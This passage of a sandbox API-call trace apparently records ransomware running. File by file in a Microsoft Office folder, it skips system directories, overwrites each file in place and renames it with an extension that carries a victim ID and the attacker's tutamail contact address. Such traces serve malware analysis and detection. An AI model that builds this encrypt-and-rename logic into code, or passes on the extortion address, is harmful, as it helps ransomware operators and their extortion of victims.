lpUsedDefaultChar=0x0) returned 12 [0141.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPE.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPE.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVELOPE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envelope.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.767] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=151291) returned 1 [0141.767] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.767] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x24ef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x24ef0, lpOverlapped=0x0) returned 1 [0141.778] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.778] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x24ef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x24ef0, lpOverlapped=0x0) returned 1 [0141.778] CloseHandle (hObject=0x238) returned 1 [0141.778] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVELOPE.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envelope.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVELOPE.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envelope.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.779] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30de, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ENVELOPE.XML", cAlternateFileName="")) returned 1 [0141.779] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2=".") returned 1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="..") returned 1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="...") returned 1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="windows") returned -1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="recovery") returned -1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="perflogs") returned -1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="documents and settings") returned 1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="system volume information") returned -1 [0141.780] lstrcmpiW (lpString1="ENVELOPE.XML", lpString2="msocache") returned -1 [0141.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPE.XML", lpUsedDefaultChar=0x0) returned 12 [0141.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVELOPE.XML", lpUsedDefaultChar=0x0) returned 12 [0141.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVELOPE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envelope.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.781] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12510) returned 1 [0141.781] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.781] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x30d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x30d0, lpOverlapped=0x0) returned 1 [0141.791] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.791] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x30d0, lpOverlapped=0x0) returned 1 [0141.792] CloseHandle (hObject=0x238) returned 1 [0141.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVELOPE.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envelope.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVELOPE.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envelope.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.793] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a32, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ENVHM.POC", cAlternateFileName="")) returned 1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2=".") returned 1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="..") returned 1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="...") returned 1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="windows") returned -1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="recovery") returned -1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="perflogs") returned -1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="documents and settings") returned 1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="system volume information") returned -1 [0141.793] lstrcmpiW (lpString1="ENVHM.POC", lpString2="msocache") returned -1 [0141.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVHM.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVHM.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVHM.POC", lpUsedDefaultChar=0x0) returned 9 [0141.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVHM.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVHM.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENVHM.POC", lpUsedDefaultChar=0x0) returned 9 [0141.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.795] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35378) returned 1 [0141.795] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.795] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8a30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x8a30, lpOverlapped=0x0) returned 1 [0141.798] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.798] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8a30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x8a30, lpOverlapped=0x0) returned 1 [0141.798] CloseHandle (hObject=0x238) returned 1 [0141.799] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENVHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\envhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.800] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1284, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FEZIP.POC", cAlternateFileName="")) returned 1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2=".") returned 1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="..") returned 1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="...") returned 1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="windows") returned -1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="recovery") returned -1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="perflogs") returned -1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="documents and settings") returned 1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="system volume information") returned -1 [0141.800] lstrcmpiW (lpString1="FEZIP.POC", lpString2="msocache") returned -1 [0141.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FEZIP.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FEZIP.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FEZIP.POC", lpUsedDefaultChar=0x0) returned 9 [0141.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FEZIP.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FEZIP.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FEZIP.POC", lpUsedDefaultChar=0x0) returned 9 [0141.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FEZIP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fezip.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.801] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4740) returned 1 [0141.801] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.801] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1280, lpOverlapped=0x0) returned 1 [0141.803] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.803] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1280, lpOverlapped=0x0) returned 1 [0141.803] CloseHandle (hObject=0x238) returned 1 [0141.803] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FEZIP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fezip.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FEZIP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fezip.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.804] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfd00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FLY98SP.POC", cAlternateFileName="")) returned 1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2=".") returned 1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="..") returned 1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="...") returned 1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="windows") returned -1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="recovery") returned -1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="perflogs") returned -1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="documents and settings") returned 1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="system volume information") returned -1 [0141.804] lstrcmpiW (lpString1="FLY98SP.POC", lpString2="msocache") returned -1 [0141.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLY98SP.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLY98SP.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLY98SP.POC", lpUsedDefaultChar=0x0) returned 11 [0141.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLY98SP.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLY98SP.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLY98SP.POC", lpUsedDefaultChar=0x0) returned 11 [0141.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLY98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fly98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.805] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=64768) returned 1 [0141.805] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.805] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfd00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xfd00, lpOverlapped=0x0) returned 1 [0141.810] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.810] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfd00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xfd00, lpOverlapped=0x0) returned 1 [0141.810] CloseHandle (hObject=0x238) returned 1 [0141.811] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLY98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fly98sp.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLY98SP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\fly98sp.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.812] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b38968, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b38968, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15369c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="FLYER.DPV", cAlternateFileName="")) returned 1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2=".") returned 1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="..") returned 1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="...") returned 1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="windows") returned -1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="recovery") returned -1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="perflogs") returned -1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="documents and settings") returned 1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="system volume information") returned -1 [0141.812] lstrcmpiW (lpString1="FLYER.DPV", lpString2="msocache") returned -1 [0141.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.DPV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLYER.DPV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLYER.DPV", lpUsedDefaultChar=0x0) returned 9 [0141.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\FLYER.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\flyer.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.813] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1390236) returned 1 [0141.813] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, 